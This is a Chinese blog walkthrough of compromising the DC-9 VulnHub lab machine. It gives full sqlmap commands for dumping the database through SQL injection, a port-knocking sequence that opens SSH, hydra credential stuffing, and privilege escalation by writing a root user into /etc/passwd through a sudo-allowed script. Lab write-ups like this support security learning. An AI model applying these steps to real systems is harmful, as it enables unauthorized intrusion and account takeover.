Chen's Blog HomeArchivesTagsCategories
DC9-vulnhub渗透测试

前言

DC:9-vlunhub渗透测试

靶机IP: 192.168.1.156

kaliIP: 192.168.1.124

渗透过程

首先namp扫描端口

image-20200212160748092

先看到80端口,访问80端口

image-20200212160845248

在search.php中存在sql注入漏洞

image-20200212161545997

image-20200212161452403

image-20200212161513174

然后跑一下sqlmap

1
sqlmap -u "http://192.168.1.156/search.php" --data="search=1'"

image-20200212010027411

确实存在漏洞,然后一路跑库

1
2
3
4
5
6
7
8
    sqlmap -u "http://192.168.1.156/search.php" --data="search=1'" -dbs

    sqlmap -u "http://192.168.1.156/search.php" --data="search=1'" -D 数据库名 -tables

    sqlmap -u "http://192.168.1.156/search.php" --data="search=1'" -D 数据库名 -T 数据表名 -columns
        
    sqlmap -u "http://192.168.1.156/search.php" --data="search=1'" -D 数据库名
-T 数据表名 -C "字段1,字段2..." --dump

image-20200212010202886

最后跑出这个数据,就是admin的密码

登陆后发现这里可能存在LFI

image-20200212162414010

image-20200212162616652

——————————-划重点————————–

最早我们有看到一个22(ssh)端口。但这里的ssh服务是启动了knock协议的。

参考文章:

保护 SSH 的三把锁

如何使用knockd让黑客看不见你的服务器?

这也是为什么最早nmap扫描的时候,看到的ssh端口是filterd的

image-20200212163136615

查看knock的配置

image-20200212021350629

1
2
3
执行命令:
apt-get install knock
knock 192.168.1.156 7469,8475,9842

下图是我们在数据库中跑出的数据,看看能不能和ssh的登录账号密码“撞库”

image-20200212025746714

跑出如下账号

image-20200212025659414

janitor登录后,发现如下文件

image-20200212030550008

再使用hydra跑一下。又跑出一个账号,密码。

image-20200212030513642

转到fredf

su fredf,然后sudo -l

发现这里可以使用root权限下的/opt/devstuff/dist/test/test

image-20200212030730925

然后查看test.py的内容(/opt/devstuff/dist/test/test实际就是执行test.py的内容,可通过命令find / -name test.py 2>/dev/null寻找脚本内容,cat查看内容)

image-20200212032957775

这是一个读文件,写入文件的脚本呢,因为可以使用root权限,所以我们往/etc/passwd下写入一个超级用户。然后提权即可

image-20200212032854554

image-20200212033051219

总结

knock协议学到了

Author: 我是小吴啦
Link: http://yoursite.com/2020/02/25/DC9-vulnhub%E6%B8%97%E9%80%8F%E6%B5%8B%E8%AF%95/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.
靶机渗透